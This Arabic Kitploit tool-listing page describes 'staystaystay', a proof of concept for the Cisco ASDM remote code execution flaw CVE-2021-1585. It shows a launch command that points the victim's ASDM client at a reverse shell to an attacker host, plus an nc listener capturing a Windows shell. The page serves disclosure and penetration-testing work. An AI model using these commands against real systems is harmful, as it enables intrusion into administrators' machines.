Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
staystaystay — إثبات المفهوم لـ CVE-2021-1585: Cisco ASA Device Manager RCE | Kitploit
أدوات/GitHubGitHub/jbaines-r7/staystaystay
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubjbaines-r7/staystaystay

staystaystay

إثبات المفهوم لـ CVE-2021-1585: Cisco ASA Device Manager RCE

عرض المستودع
134منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

staystaystay

staystaystay هو إثبات مفهوم لاستغلال CVE-2021-1585، وهي مشكلة تنفيذ أوامر عن بعد (RCE) عبر وسيط أو نقطة نهاية خبيثة تؤثر على مدير جهاز Cisco ASA (ASDM). تم اكتشاف المشكلة في الأصل بواسطة Malcolm Lashley وتم الكشف عنها في صيف 2021. ومع ذلك، في الوقت الذي كنت أبحث فيه عن هذا، كانت غير معالجة في أحدث إصدار (ASDM 7.17(1))، وقد صادفت هذا بشكل مستقل.

قامت Cisco "بإصلاح" هذا في ASDM 7.18(1.152). أقول "إصلاح" لأن هذا الاستغلال لا يزال يعمل بشكل جيد. سيحتاج المستخدم فقط إلى النقر على "نعم". انظر الفيديو أدناه.

يمكن للمهاجمين تكوين نوعين من الأحمال للحصول على شل عكسي إلى الضحية:

  • مستند إلى jjs.exe (ملف يلامس القرص - وقد تم اكتشافه مؤخرًا بواسطة Windows Defender)
  • مستند إلى Longtime Sunshine

إذا قام الضحية بتوصيل ASDM الخاص به بـ staystaystay فسيقوم بحقن الحمولة المكونة مما يؤدي إلى شل عكسي. يمكن التقاط شل العكسي jjs باستخدام مستمع nc نموذجي (أو حتى Metasploit، إذا أردت). خيار Longtime Sunshine يتطلب أن يستخدم المهاجم هذا الإطار.

كمثال، سيبدأ الأمر التالي staystaystay على المنفذ 8443 مع حمولة jjs:

root@kitploit:~
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443

بمجرد أن يتصل الضحية بـ 8443، سيتم إنشاء شل عكسي إلى 10.0.0.2:1270:

root@kitploit:~
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster

C:\Program Files (x86)\Cisco Systems\ASDM>

يحتوي الفيديو التالي على مثال للاستغلال باستخدام Longtime Sunshine:

  • https://www.youtube.com/watch?v=07VO2JGTWR8

يوضح الفيديو التالي الهجوم ضد إصدار مُصحح:

  • https://www.youtube.com/watch?v=ySgbHClk9HE

يمكن العثور على مقالة AttackerKB هنا:

  • https://attackerkb.com/topics/0vIso8fLhQ/cve-2021-1585/rapid7-analysis

الإشادة

  • تايلور سويفت - النسخة الصوتية
تنزيل الأداة